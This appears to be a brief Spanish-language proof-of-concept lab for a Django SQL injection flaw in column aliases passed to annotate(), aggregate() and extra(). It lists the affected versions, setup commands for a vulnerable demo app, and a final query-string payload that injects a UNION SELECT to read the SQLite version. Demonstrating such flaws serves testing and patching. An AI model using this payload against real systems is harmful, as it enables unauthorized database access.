
Se descubrió un problema en Django 2.2 anterior a 2.2.28, 3.2 anterior a 3.2.13 y 4.0 anterior a 4.0.4. Los métodos QuerySet.annotate(), aggregate() y extra() son vulnerables a inyección SQL en alias de columnas mediante un diccionario especialmente diseñado (con expansión de diccionario) pasado como **kwargs.
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
